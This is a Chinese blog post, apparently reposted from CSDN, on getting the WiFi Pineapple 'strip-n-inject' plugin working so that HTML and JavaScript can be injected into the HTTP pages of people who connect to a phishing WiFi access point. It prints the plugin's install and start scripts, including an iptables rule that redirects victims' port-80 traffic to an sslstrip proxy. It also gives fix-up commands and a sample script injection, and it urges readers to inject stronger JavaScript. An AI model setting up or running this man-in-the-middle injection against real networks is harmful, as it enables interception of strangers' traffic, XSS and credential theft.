WIFI菠萝 strip-n-inject插件安装与使用

来源:互联网 发布:管道放样软件 编辑:程序博客网 时间:2024/04/27 19:37

WIFI菠萝有一个strip-n-inject插件。可以在其他人连上钓鱼WIFI浏览网页时,在其网页源码末尾插入文字。当然包括HTML标签和Javascript代码。所以可以做到XSS攻击。


而一开始将strip-n-inject插件放到/pineapple/components/infusions/目录,打开Web页面,点Install按钮,一般是安装不成功的。


于是看了一下它的安装脚本:

/pineapple/components/infusions/strip-n-inject/includes/install.sh

#!/bin/shinstalled="0"# install depsopkg remove twisted-web --force-depends && opkg update && opkg install twisted-web && installed="1"if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then  ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/fiif [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then  ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/fiif [ "${installed}" == "1" ]; then  touch installedfi

从第六行可以看出,安装时卸载了twisted-web,然后又安装了一遍twisted-web。“twisted-web”是Python的一个Web应用开发框架。而WIFI菠萝也确实存在twisted-web。所以可以直接创建”installed“文件表示已安装。

# touch /pineapple/components/infusions/strip-n-inject/includes/installed


刷新网页后就显示安装好了。


不过只是点Start还是显示”Strip-N-Inject is not running...“。


原因很简单,插件运行时执行了/pineapple/components/infusions/strip-n-inject/includes/proxy/sslstrip.py脚本,并带上”/sd/tmp/proxy_inject.log“参数。显然,”/sd/tmp/“目录并不存在。


所以,我们可以创建这个目录:

# mkdir /sd/tmp


或者我们改动插件,指向”/tmp/“目录。

涉及到保存目录的文件有两个:include/data.php、include/start.sh。

include/data.php

<?phprequire("/pineapple/components/infusions/strip-n-inject/handler.php");global $directory, $rel_dir;require($directory."includes/vars.php");if (isset($_GET['proxylog'])){  if ($is_codeinject_running)  {    // get some info    $log_cmd = "touch /sd/tmp/proxy_inject.log ; tail -n 50 /sd/tmp/proxy_inject.log";    exec ($log_cmd, $output1);    foreach($output1 as $outputline1) { echo ("$outputline1\n"); }  }  else  {    echo "Strip-N-Inject is not running...";  }}?>
只要更改14行,去掉两个”/sd“。

include/start.sh 

#!/bin/bash# setup varsexport PATH=$PATH:/sd/usr/bin:/sd/usr/sbinattacker_ip="$(cat proxy/attacker_ip.txt)"# set our iptables redirectiptables -t nat -A PREROUTING ! -s "${attacker_ip}" -p tcp --destination-port 80 -j REDIRECT --to-ports 10000#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000# start sslstrip/inject proxycd proxypython sslstrip.py -s -k -f -w /sd/tmp/proxy_inject.log 2>&1 | at now &exit 0 
同样更改倒数第三行就可以了。


然后我们Start一下。

成功了。



然后就可以开始使用了。

点”Injection Code“,然后可以在文本框中输入要注入的内容。比如JavaScript代码:

<script>alert("哈哈哈。")</script>
很简单,就是弹出写有”哈哈哈。“的对话框。


注意”Attacker IP“填好自己IP地址。当然,如果你在WIFI菠萝的父网段中也可以不设置。然后点Start


当其他人连上钓鱼WIFI并访问HTTP网页时(HTTPS没有):


当然也可以注入HTML标签:



当然远不止这样,你可以注入更牛逼的JS脚本。


如有谬误,望加指正。

转载注明出处:http://blog.csdn.net/qq_15983713/article/details/50242309

0 0